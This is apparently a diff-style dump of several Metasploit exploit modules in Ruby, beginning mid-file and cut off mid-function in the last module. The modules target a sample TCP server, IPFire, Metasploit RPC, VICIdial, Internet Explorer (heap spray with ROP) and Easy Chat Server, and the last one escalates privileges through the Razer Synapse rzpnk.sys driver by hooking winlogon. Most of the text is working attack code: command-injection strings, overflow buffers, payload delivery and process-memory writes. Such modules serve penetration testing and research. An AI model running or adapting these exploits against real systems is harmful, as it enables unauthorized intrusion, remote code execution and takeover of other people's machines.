# See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the
|
||||
# vulnerable target program.
|
||||
#
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
# The Name should be just like the line of a Git commit - software name,
|
||||
# vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
|
||||
# some search optimization so people can actually find the module.
|
||||
# We encourage consistency between module name and file name.
|
||||
'Name' => 'Sample Exploit',
|
||||
'Description' => %q{
|
||||
This exploit module illustrates how a vulnerability could be exploited
|
||||
in an TCP server that has a parsing bug.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['skape'],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '12345' ],
|
||||
[ 'EDB', '12345' ],
|
||||
[ 'URL', 'http://www.example.com'],
|
||||
[ 'CVE', '1978-1234'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Target 0: Windows All
|
||||
[
|
||||
'Windows XP/Vista/7/8',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x41424344
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => "Apr 1 2013",
|
||||
# Note that this is by index, rather than name. It's generally easiest
|
||||
# just to put the default at the beginning of the list and skip this
|
||||
# entirely.
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
#
|
||||
# The sample exploit just indicates that the remote host is always
|
||||
# vulnerable.
|
||||
#
|
||||
def check
|
||||
Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
#
|
||||
# The exploit method connects to the remote service and sends 1024 random bytes
|
||||
# followed by the fake return address and then the payload.
|
||||
#
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Sending #{payload.encoded.length} byte payload...")
|
||||
|
||||
# Build the buffer for transmission
|
||||
buf = rand_text_alpha(1024)
|
||||
buf << [ target.ret ].pack('V')
|
||||
buf << payload.encoded
|
||||
|
||||
# Send it off
|
||||
sock.put(buf)
|
||||
sock.get_once
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -0,0 +1,119 @@
|
|||
##
|
||||
## This module requires Metasploit: http://metasploit.com/download
|
||||
## Current source: https://github.com/rapid7/metasploit-framework
|
||||
###
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
Rank = ExcellentRanking
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'IPFire proxy.cgi RCE',
|
||||
'Description' => %q(
|
||||
IPFire, a free linux based open source firewall distribution,
|
||||
version < 2.19 Update Core 110 contains a remote command execution
|
||||
vulnerability in the ids.cgi page in the OINKCODE field.
|
||||
),
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@stcyrsecurity.com>', # module
|
||||
'0x09AL' # discovery
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '42149' ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' => { 'SSL' => true },
|
||||
'Arch' => [ ARCH_CMD ],
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'perl awk openssl'
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 09 2017'
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
|
||||
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
|
||||
Opt::RPORT(444)
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
# authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
|
||||
# after a chat with @bcoles in IRC.
|
||||
res = send_request_cgi(
|
||||
'uri' => '/cgi-bin/pakfire.cgi',
|
||||
'method' => 'GET',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
|
||||
end
|
||||
if version.nil? || update.nil? || !Gem::Version.correct?(version)
|
||||
vprint_error('No Recognizable Version Found')
|
||||
CheckCode::Safe
|
||||
elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110
|
||||
CheckCode::Appears
|
||||
else
|
||||
vprint_error('Version and/or Update Not Supported')
|
||||
CheckCode::Safe
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("Connection Failed")
|
||||
CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
# authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
|
||||
# after a chat with @bcoles in IRC.
|
||||
vprint_status('Sending request')
|
||||
res = send_request_cgi(
|
||||
'uri' => '/cgi-bin/ids.cgi',
|
||||
'method' => 'POST',
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'headers' =>
|
||||
{
|
||||
'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
|
||||
},
|
||||
'vars_post' => {
|
||||
'ENABLE_SNORT_GREEN' => 'on',
|
||||
'ENABLE_SNORT' => 'on',
|
||||
'RULES' => 'registered',
|
||||
'OINKCODE' => "`#{payload.encoded}`",
|
||||
'ACTION' => 'Download new ruleset',
|
||||
'ACTION2' => 'snort'
|
||||
}
|
||||
)
|
||||
|
||||
# success means we hang our session, and wont get back a response, so just check we get a response back
|
||||
if res && res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,152 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/rpc/v10/client'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit RPC Console Command Execution',
|
||||
'Description' => %q{
|
||||
This module connects to a specified Metasploit RPC server and
|
||||
uses the 'console.write' procedure to execute operating
|
||||
system commands. Valid credentials are required to access the
|
||||
RPC interface.
|
||||
|
||||
This module has been tested successfully on Metasploit 4.15
|
||||
on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
|
||||
4.14 on Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
|
||||
[ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
|
||||
],
|
||||
'Platform' => %w{ ruby unix win },
|
||||
'Targets' => [
|
||||
[ 'Ruby', { 'Arch' => ARCH_RUBY,
|
||||
'Platform' => 'ruby',
|
||||
'Payload' => { 'BadChars' => "\x00" } } ],
|
||||
[ 'Windows CMD', { 'Arch' => ARCH_CMD,
|
||||
'Platform' => 'win',
|
||||
'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ],
|
||||
[ 'Unix CMD', { 'Arch' => ARCH_CMD,
|
||||
'Platform' => 'unix',
|
||||
'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ]
|
||||
],
|
||||
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'May 22 2011',
|
||||
'DefaultTarget' => 0))
|
||||
register_options [ Opt::RPORT(55552),
|
||||
OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
|
||||
OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
|
||||
OptBool.new('SSL', [ true, 'Use SSL', true]) ]
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"
|
||||
|
||||
if res.nil?
|
||||
fail_with Failure::Unknown, 'Connection failed'
|
||||
end
|
||||
|
||||
unless res['wrote'].to_s =~ /\A\d+\z/
|
||||
print_error "Could not write to console #{@console_id}:"
|
||||
print_line res.to_s
|
||||
return
|
||||
end
|
||||
|
||||
vprint_good "Wrote #{res['wrote']} bytes to console"
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
@rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
|
||||
rescue Rex::ConnectionRefused => e
|
||||
fail_with Failure::Unreachable, 'Connection refused'
|
||||
rescue => e
|
||||
fail_with Failure::Unknown, "Connection failed: #{e}"
|
||||
end
|
||||
|
||||
res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']
|
||||
|
||||
if @rpc.token.nil?
|
||||
fail_with Failure::NoAccess, 'Authentication failed'
|
||||
end
|
||||
|
||||
print_good 'Authenticated successfully'
|
||||
vprint_status "Received temporary token: #{@rpc.token}"
|
||||
|
||||
version = @rpc.call 'core.version'
|
||||
|
||||
if res.nil?
|
||||
fail_with Failure::Unknown, 'Connection failed'
|
||||
end
|
||||
|
||||
print_status "Metasploit #{version['version']}"
|
||||
print_status "Ruby #{version['ruby']}"
|
||||
print_status "API version #{version['api']}"
|
||||
|
||||
vprint_status 'Creating new console...'
|
||||
res = @rpc.call 'console.create'
|
||||
|
||||
if res.nil?
|
||||
fail_with Failure::Unknown, 'Connection failed'
|
||||
end
|
||||
|
||||
unless res['id'].to_s =~ /\A\d+\z/
|
||||
print_error 'Could not create console:'
|
||||
print_line res.to_s
|
||||
return
|
||||
end
|
||||
|
||||
@console_id = res['id']
|
||||
print_good "Created console ##{@console_id}"
|
||||
|
||||
print_status 'Sending payload...'
|
||||
|
||||
case target['Platform']
|
||||
when 'ruby'
|
||||
cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
|
||||
when 'win'
|
||||
cmd = payload.encoded
|
||||
when 'unix'
|
||||
cmd = payload.encoded
|
||||
else
|
||||
fail_with Failure::NoTarget, 'Invalid target'
|
||||
end
|
||||
|
||||
execute_command cmd
|
||||
end
|
||||
|
||||
def cleanup
|
||||
return if @console_id.nil?
|
||||
|
||||
vprint_status 'Removing console...'
|
||||
res = @rpc.call 'console.destroy', @console_id
|
||||
|
||||
if res.nil?
|
||||
print_error 'Connection failed'
|
||||
return
|
||||
end
|
||||
|
||||
unless res['result'].eql? 'success'
|
||||
print_warning "Could not destroy console ##{@console_id}:"
|
||||
print_line res.to_s
|
||||
return
|
||||
end
|
||||
|
||||
vprint_good "Destroyed console ##{@console_id}"
|
||||
ensure
|
||||
@rpc.close
|
||||
end
|
||||
end
|
|
@ -0,0 +1,112 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'VICIdial user_authorization Unauthenticated Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in VICIdial versions
|
||||
2.9 RC 1 to 2.13 RC1 which allows unauthenticated users
|
||||
to execute arbitrary operating system commands as the web
|
||||
server user if password encryption is enabled (disabled
|
||||
by default).
|
||||
|
||||
When password encryption is enabled the user's password
|
||||
supplied using HTTP basic authentication is used in a call
|
||||
to exec().
|
||||
|
||||
This module has been tested successfully on version 2.11 RC2
|
||||
and 2.13 RC1 on CentOS.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016']
|
||||
],
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
# HTTP Basic authentication password
|
||||
'Space' => 2048,
|
||||
# apostrophe ('), quote ("), semi-colon (;) and backslash (\)
|
||||
# are removed by preg_replace
|
||||
'BadChars' => "\x00\x0A\x22\x27\x3B\x5C",
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl python netcat'
|
||||
}
|
||||
},
|
||||
'Targets' => [[ 'Automatic Targeting', {} ]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'May 26 2017',
|
||||
'DefaultTarget' => 0))
|
||||
register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ])
|
||||
deregister_options('USERNAME', 'PASSWORD')
|
||||
end
|
||||
|
||||
def check
|
||||
user = rand_text_alpha(rand(10) + 5)
|
||||
pass = "#{rand_text_alpha(rand(10) + 5)}&#"
|
||||
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
|
||||
'authorization' => basic_auth(user, pass)
|
||||
|
||||
unless res
|
||||
vprint_status 'Connection failed'
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res.code != 401
|
||||
vprint_status "#{peer} Unexpected reply. Expected authentication failure."
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
# Check for input filtering of '#' and '&' characters in password
|
||||
# Response for invalid credentials is in the form of: |<username>|<password>|BAD|
|
||||
if res.body !~ /\|#{user}\|#{pass}\|BAD\|/
|
||||
vprint_status "#{peer} Target is patched."
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
# Check for ../agc/bp.pl password encryption script
|
||||
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')
|
||||
if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
|
||||
vprint_status "#{peer} Password encryption is supported, but may not be enabled."
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
vprint_status "#{peer} Could not verify whether password encryption is supported."
|
||||
CheckCode::Detected
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
user = rand_text_alpha(rand(10) + 5)
|
||||
pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #"
|
||||
|
||||
print_status "#{peer} Sending payload (#{cmd.length} bytes)"
|
||||
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
|
||||
'authorization' => basic_auth(user, pass)
|
||||
|
||||
if !res
|
||||
fail_with(Failure::Unreachable, 'Connection failed')
|
||||
elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
|
||||
print_good "#{peer} Payload sent successfully"
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, 'Unexpected reply')
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
execute_command(payload.encoded)
|
||||
end
|
||||
end
|
|
@ -0,0 +1,144 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
###
|
||||
#
|
||||
# This exploit sample demonstrates how a typical browser exploit is written using commonly
|
||||
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
|
||||
#
|
||||
###
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
# Set :classid and :method for ActiveX exploits. For example:
|
||||
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
|
||||
# :method => "SetShapeNodeType",
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "8.0",
|
||||
:ua_maxver => "10.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::Match::WINDOWS,
|
||||
:rank => NormalRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Module Name",
|
||||
'Description' => %q{
|
||||
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
|
||||
the browser version. Please note IE8 and newer may emulate an older IE version
|
||||
in compatibility mode, in that case the module won't be able to detect the
|
||||
browser correctly.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://metasploit.com' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
|
||||
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
|
||||
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00", # js_property_spray
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Apr 1 2013",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
when '6.2'
|
||||
os_name = 'Windows 8'
|
||||
when '6.3'
|
||||
os_name = 'Windows 8.1'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
def get_payload(t)
|
||||
stack_pivot = "\x41\x42\x43\x44"
|
||||
code = payload.encoded
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
|
||||
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
|
||||
end
|
||||
|
||||
rop_payload
|
||||
end
|
||||
|
||||
|
||||
def get_html(t)
|
||||
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
|
||||
html = %Q|
|
||||
<script>
|
||||
#{js_property_spray}
|
||||
|
||||
var s = unescape("#{js_p}");
|
||||
sprayHeap({shellcode:s});
|
||||
</script>
|
||||
|
|
||||
|
||||
html.gsub(/^\t\t/, '')
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
print_status("Requesting: #{request.uri}")
|
||||
|
||||
target = get_target(agent)
|
||||
if target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Target selected as: #{target.name}")
|
||||
html = get_html(target)
|
||||
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
|
||||
end
|
||||
end
|
|
@ -0,0 +1,74 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow during user registration in Easy Chat Server software.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Marco Rivoli', #Metasploit
|
||||
'Aitezaz Mohsin' #POC
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '42155' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 80,
|
||||
'EXITFUNC' => 'thread',
|
||||
'ENCODER' => 'x86/alpha_mixed'
|
||||
},
|
||||
'DisclosureDate' => 'Oct 09 2017',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
sploit = rand_text_alpha_upper(217)
|
||||
sploit << "\xeb\x06\x90\x90"
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(200)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(URI,'registresult.htm'),
|
||||
'method' => 'POST',
|
||||
'vars_post' => {
|
||||
'UserName' => sploit,
|
||||
'Password' => 'test',
|
||||
'Password1' => 'test',
|
||||
'Sex' => 1,
|
||||
'Email' => 'x@',
|
||||
'Icon' => 'x.gif',
|
||||
'Resume' => 'xxxx',
|
||||
'cw' => 1,
|
||||
'RoomID' => 4,
|
||||
'RepUserName' => 'admin',
|
||||
'submit1' => 'Register'
|
||||
}
|
||||
})
|
||||
handler
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,260 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/local/windows_kernel'
|
||||
require 'rex'
|
||||
require 'metasm'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Local::WindowsKernel
|
||||
include Msf::Post::Windows::Priv
|
||||
|
||||
# the max size our hook can be, used before it's generated for the allocation
|
||||
HOOK_STUB_MAX_LENGTH = 256
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
|
||||
'Description' => %q{
|
||||
A vulnerability exists in the latest version of Razer Synapse
|
||||
(v2.20.15.1104 as of the day of disclosure) which can be leveraged
|
||||
locally by a malicious application to elevate its privileges to those of
|
||||
NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
|
||||
in the rzpnk.sys driver that passes a PID specified by the user to
|
||||
ZwOpenProcess. This can be issued by an application to open a handle to
|
||||
an arbitrary process with the necessary privileges to allocate, read and
|
||||
write memory in the specified process.
|
||||
|
||||
This exploit leverages this vulnerability to open a handle to the
|
||||
winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
|
||||
installing a hook to execute attacker controlled shellcode. This hook is
|
||||
then triggered on demand by calling user32!LockWorkStation(), resulting
|
||||
in the attacker's payload being executed with the privileges of the
|
||||
infected winlogon process. In order for the issued IOCTL to work, the
|
||||
RazerIngameEngine.exe process must not be running. This exploit will
|
||||
check if it is, and attempt to kill it as necessary.
|
||||
|
||||
The vulnerable software can be found here:
|
||||
https://www.razerzone.com/synapse/. No Razer hardware needs to be
|
||||
connected in order to leverage this vulnerability.
|
||||
|
||||
This exploit is not opsec-safe due to the user being logged out as part
|
||||
of the exploitation process.
|
||||
},
|
||||
'Author' => 'Spencer McIntyre',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['CVE', '2017-9769'],
|
||||
['URL', 'https://warroom.securestate.com/cve-2017-9769/']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested on (64 bits):
|
||||
# * Windows 7 SP1
|
||||
# * Windows 10.0.10586
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'WfsDelay' => 20
|
||||
},
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Mar 22 2017'))
|
||||
end
|
||||
|
||||
def check
|
||||
# Validate that the driver has been loaded and that
|
||||
# the version is the same as the one expected
|
||||
client.sys.config.getdrivers.each do |d|
|
||||
if d[:basename].downcase == 'rzpnk.sys'
|
||||
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
|
||||
target_checksum = client.fs.file.md5(d[:filename])
|
||||
|
||||
if expected_checksum == Rex::Text.to_hex(target_checksum, '')
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
|
||||
end
|
||||
|
||||
if session.platform != 'windows'
|
||||
fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
|
||||
elsif session.arch != ARCH_X64
|
||||
fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
|
||||
end
|
||||
|
||||
pid = session.sys.process['RazerIngameEngine.exe']
|
||||
if pid
|
||||
# if this process is running, the IOCTL won't work but the process runs
|
||||
# with user privileges so we can kill it
|
||||
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
|
||||
session.sys.process.kill(pid)
|
||||
end
|
||||
|
||||
pid = session.sys.process['winlogon.exe']
|
||||
print_status("Found winlogon pid: #{pid}")
|
||||
|
||||
handle = get_handle(pid)
|
||||
fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
|
||||
vprint_status('Successfully opened a handle to the winlogon process')
|
||||
|
||||
winlogon = session.sys.process.new(pid, handle)
|
||||
allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
|
||||
shellcode_address = winlogon.memory.allocate(allocation_size)
|
||||
winlogon.memory.protect(shellcode_address)
|
||||
print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
|
||||
winlogon.memory.write(shellcode_address, payload.encoded)
|
||||
hook_stub_address = shellcode_address + payload.encoded.length
|
||||
|
||||
result = session.railgun.kernel32.LoadLibraryA('user32')
|
||||
fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
|
||||
user32_handle = result['return']
|
||||
|
||||
# resolve and backup the functions that we'll install trampolines in
|
||||
user32_trampolines = {} # address => original chunk
|
||||
user32_functions = ['LockWindowStation']
|
||||
user32_functions.each do |function|
|
||||
address = get_address(user32_handle, function)
|
||||
winlogon.memory.protect(address)
|
||||
user32_trampolines[function] = {
|
||||
address: address,
|
||||
original: winlogon.memory.read(address, 24)
|
||||
}
|
||||
end
|
||||
|
||||
# generate and install the hook asm
|
||||
hook_stub = get_hook(shellcode_address, user32_trampolines)
|
||||
fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
|
||||
# if this happens, there was a programming error
|
||||
fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
|
||||
|
||||
winlogon.memory.write(hook_stub_address, hook_stub)
|
||||
vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
|
||||
|
||||
# install the asm trampolines to jump to the hook
|
||||
user32_trampolines.each do |function, trampoline_info|
|
||||
address = trampoline_info[:address]
|
||||
trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
|
||||
mov rax, 0x#{address.to_s(16)}
|
||||
push rax
|
||||
mov rax, 0x#{hook_stub_address.to_s(16)}
|
||||
jmp rax
|
||||
}).encode_string
|
||||
winlogon.memory.write(address, trampoline)
|
||||
vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
|
||||
end
|
||||
|
||||
session.railgun.user32.LockWorkStation()
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
end
|
||||
|
||||
def get_address(dll_handle, function_name)
|
||||
result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
|
||||
